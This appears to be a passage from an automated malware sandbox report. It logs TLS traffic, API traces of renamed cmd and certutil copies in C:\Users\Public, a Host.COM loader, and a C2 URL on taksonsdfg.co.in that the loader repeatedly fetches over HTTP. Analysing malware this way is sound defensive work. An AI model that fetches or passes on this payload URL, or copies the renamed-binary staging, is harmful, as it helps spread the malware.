Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50160 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50162 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50164 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50172 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50176 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50178 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50180 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50182 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50184 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50186 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50188 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50190 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50192 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50196 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50198 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50200 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50202 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50204 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50206 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50208 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50210 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50212 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50214 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50216 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50218 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50220 version: TLS 1.2

Source:	Binary string: easinvoker.pdb source: Host.COM, Host.COM, 00000009.00000002.3035851816.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3033680777.0000000002266000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800195729.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1801015000.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: alpha.exe, 00000003.00000000.1772397847.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1776065689.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1787491764.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1795092771.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1796653193.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1799303779.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1799884208.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1801167117.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source:	Binary string: certutil.pdb source: kn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: cmd.pdb source: alpha.exe, 00000003.00000000.1772397847.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1776065689.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1787491764.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1795092771.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1796653193.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1799303779.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1799884208.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1801167117.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source:	Binary string: easinvoker.pdbGCTL source: Host.COM, 00000009.00000002.3035851816.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800405801.000000000286A000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3034224686.0000000002871000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3033680777.0000000002266000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800195729.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1801015000.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: certutil.pdbGCTL source: kn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp

Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	3_2_00007FF79375823C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	3_2_00007FF793752978
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,	3_2_00007FF793767B4C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	3_2_00007FF7937435B8
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	3_2_00007FF793741560
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	5_2_00007FF79375823C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	5_2_00007FF793752978
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,	5_2_00007FF793767B4C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	5_2_00007FF7937435B8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	5_2_00007FF793741560
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E087234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,	6_2_00007FF7E087234C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E080C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,	6_2_00007FF7E080C6F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0876F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,	6_2_00007FF7E0876F80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08710C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,	6_2_00007FF7E08710C4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0873100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,	6_2_00007FF7E0873100
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,	6_2_00007FF7E081B3D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,	6_2_00007FF7E081D4A4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07DD440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF7E07DD440
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0853674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,	6_2_00007FF7E0853674
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08719F8 #359,FindFirstFileW,FindNextFileW,FindClose,	6_2_00007FF7E08719F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0871B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,	6_2_00007FF7E0871B04
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,	6_2_00007FF7E081DBC0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0815E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,	6_2_00007FF7E0815E58
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02DF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	9_2_02DF5908
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	10_2_00007FF79375823C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	10_2_00007FF793752978
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,	10_2_00007FF793767B4C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	10_2_00007FF7937435B8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	10_2_00007FF793741560
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	11_2_00007FF79375823C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	11_2_00007FF793752978
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,	11_2_00007FF793767B4C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	11_2_00007FF7937435B8
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	11_2_00007FF793741560

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx

Contains functionality to check if a connection to the internet is available

Source: C:\Users\Public\Libraries\Host.COM

Code function: 9_2_02E0E4B4 InternetCheckConnectionA,

9_2_02E0E4B4

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 108.170.55.202 108.170.55.202

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: SSASN2US SSASN2US

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
